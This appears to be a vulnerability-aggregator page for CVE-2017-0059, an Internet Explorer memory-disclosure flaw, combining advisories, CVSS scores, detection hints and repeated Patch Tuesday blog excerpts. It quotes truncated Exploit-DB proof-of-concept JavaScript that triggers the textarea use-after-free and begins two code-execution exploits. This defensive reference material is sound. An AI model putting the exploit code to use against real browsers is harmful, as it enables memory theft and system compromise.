CVE-2017-0059
published 2017-03-17CVE-2017-0059: Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet…
PriorityP277medium4.3CVSS 3.1
AVNACLPRNUIRSUCLINAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
61.97%
99.1th percentile
Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0008 and CVE-2017-0009.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft_corporation | internet_explorer | — | — |
| msrc | internet_explorer_10_on_windows_server_2012 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_7_for_32-bit_systems_service_pack_1 | — | — |
| msrc | internet_explorer_11_on_windows_7_for_x64-based_systems_service_pack_1 | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_rt_8.1 | — | — |
| msrc | internet_explorer_11_on_windows_server_2008_r2_for_x64-based_systems_service_pac | — | — |
| msrc | internet_explorer_11_on_windows_server_2012_r2 | — | — |
| msrc | internet_explorer_11_on_windows_server_2016 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_x64-based_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_x64_edition_service_pack_2 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The exploit triggers a use-after-free via textarea.defaultValue manipulation combined with an iframe onreadystatechange event and form.reset() — monitor for this DOM interaction pattern in IE11. ↗
- →The memory disclosure is triggered through MSHTML!CRichtext::SetValueHelperInternal and MSHTML!CFormElement::DoReset — these call stack frames are indicative of exploitation attempts. ↗
- →The freed allocation is reallocated via MSHTML!CTravelLog::_AddEntryInternal — heap reallocation of freed text buffers is the exploitation primitive; text allocations are not protected by MemGC. ↗
- →RCE exploit (MS17-007/EDB-42354) chains the same textarea UAF infoleak with heap spray and ROP chain using PROPSYS.dll gadgets — detect heap spray patterns combined with audio element allocation after textarea.defaultValue reset. ↗
- →RCE exploit (EDB-43125) uses canvas element allocation as the heap replacement object after the textarea UAF — detect canvas context creation immediately following form.reset() in IE11. ↗
- →CSS classes using float:left with column-count and column-span:all are present in both RCE exploit pages — this CSS combination may be used as a layout trigger for the exploit primitive. ↗
- ·CVE-2017-0059 is an information disclosure only; the RCE exploits (EDB-42354, EDB-43125) are for the related MS17-007 (CVE-2017-0037 area) and chain this infoleak as a first stage — do not conflate the infoleak CVE with full RCE. ↗
- ·MSRC marks exploitation status as 'Publicly Disclosed: No; Exploited: No' at time of advisory, but CISA KEV lists it as a known exploited vulnerability with a remediation due date of 2022-04-18. ↗
CVSS provenance
nvdv3.14.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
vulncheck4.3MEDIUM
cisa4.3MEDIUM
vendor_msrc2.4LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Internet Explorer Information Disclosure Vulnerability
cisa·2022-03-28·CVSS 4.3
CVE-2017-0059 [MEDIUM] CWE-200 Microsoft Internet Explorer Information Disclosure Vulnerability
Vulnerability: Microsoft Internet Explorer Information Disclosure Vulnerability
Affected: Microsoft Internet Explorer
Microsoft Internet Explorer allow remote attackers to obtain sensitive information from process memory via a crafted web site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0059
Remediation Due Date: 2022-04-18
Microsoft
Microsoft Browser Information Disclosure Vulnerability
vendor_msrc·2017-03-14·CVSS 2.4
CVE-2017-0059 [MEDIUM] Microsoft Browser Information Disclosure Vulnerability
Microsoft Browser Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when affected Microsoft browsers improperly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system.
To exploit the vulnerability, in a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action
GHSA
GHSA-36pj-p9j3-7rr9: Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Inter
ghsa_unreviewed·2022-05-17·CVSS 4.3
CVE-2017-0059 [MEDIUM] CWE-200 GHSA-36pj-p9j3-7rr9: Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Inter
Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0008 and CVE-2017-0009.
GHSA
GHSA-h79h-p55m-548h: Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Inter
ghsa_unreviewed·2022-05-17·CVSS 4.3
CVE-2017-0008 [MEDIUM] CWE-200 GHSA-h79h-p55m-548h: Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Inter
Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0009 and CVE-2017-0059.
VulnCheck
Microsoft Internet Explorer Information Disclosure Vulnerability
vulncheck·2017·CVSS 4.3
CVE-2017-0059 [MEDIUM] CWE-200 Microsoft Internet Explorer Information Disclosure Vulnerability
Microsoft Internet Explorer Information Disclosure Vulnerability
Microsoft Internet Explorer allow remote attackers to obtain sensitive information from process memory via a crafted web site.
Affected: Microsoft Internet Explorer
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.threatstop.com/blog/bi-weekly-security-update-8/18/2017-0; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-10-17
CVE-2017-0059 Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
---
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
var ntdllBase = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var j = document.createElement("canvas");
ctx=j.getContext("2d");
ctx.beginPath();
ctx.moveTo(20,20);
ctx.lineTo(20,100);
ctx.lineTo(70,100);
ctx.strokeStyle="red";
ctx.strok
Exploit-DB
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-07-24
CVE-2017-0059 Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
---
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
var base_leaked_addr = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var audioElm = document.createElement("audio");
audioElm.src = "test.mp3";
}
function writeu(base, offs) {
var res = 0;
if (base != 0) { res = base + offs }
else { res = offs }
re
Exploit-DB
Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
exploitdb·2017-03-20
CVE-2017-0059 Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
---
function run() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
alert("Text value freed, can be reallocated here");
}
aaaaaaaaaaaaaaaaaaaaaaaa
k
# ChildEBP RetAddr
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MS
Zscaler
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
blogs_zscaler·2017-09-12
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Exploits & Vulnerabilities
# March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro
2017/03/15
Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB). This vulnerability potentially allows cyber criminals to render affected system
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Ausnutzung von Schwachstellen
## March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro Mar 15, 2017 Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012 , which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB) . This vulnerability potentially allows cyber criminals to render affected
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Sfruttamento vulnerabilità
## March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro Mar 15, 2017 Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012 , which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB) . This vulnerability potentially allows cyber criminals to render affected sy
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Exploits y vulnerabilidades
## March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro Mar 15, 2017 Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012 , which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB) . This vulnerability potentially allows cyber criminals to render affected s
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Exploits & Vulnerabilities
## March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro 2017/03/15 Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012 , which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB) . This vulnerability potentially allows cyber criminals to render affected syst
Trendmicro
March 2017 Patch Tuesday: 18 Security Bulletins
blogs_trendmicro·2017-03-15·CVSS 7.8
CVE-2017-0016 [HIGH] March 2017 Patch Tuesday: 18 Security Bulletins
Exploits & Vulnerabilities
## March 2017 Patch Tuesday: 18 Security Bulletins
Patch Tuesday for March is hefty, with essentially two months’ worth of updates after Microsoft delayed its February patch release. Notable among the critical bulletins is MS17-012, which resolves several vulnerabilities including CVE-2017-0016.
By: Trend Micro Mar 15, 2017 Read time: ( words)
Save to Folio
Patch Tuesday for March is a hefty one, with essentially two months’ worth of updates after Microsoft quietly delayed its February patch release. Notable among the critical bulletins is MS17-012 , which resolves several vulnerabilities including CVE-2017-0016, a zero-day vulnerability involving Windows Server Message Block (SMB) . This vulnerability potentially allows cyber criminals to render affected sy
http://www.securityfocus.com/bid/96645http://www.securitytracker.com/id/1038008https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0059https://www.exploit-db.com/exploits/41661/https://www.exploit-db.com/exploits/42354/https://www.exploit-db.com/exploits/43125/http://www.securityfocus.com/bid/96645http://www.securitytracker.com/id/1038008https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0059https://www.exploit-db.com/exploits/41661/https://www.exploit-db.com/exploits/42354/https://www.exploit-db.com/exploits/43125/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-0059
2017-03-17
Published
2022-03-28
Added to CISA KEV
Exploited in the wild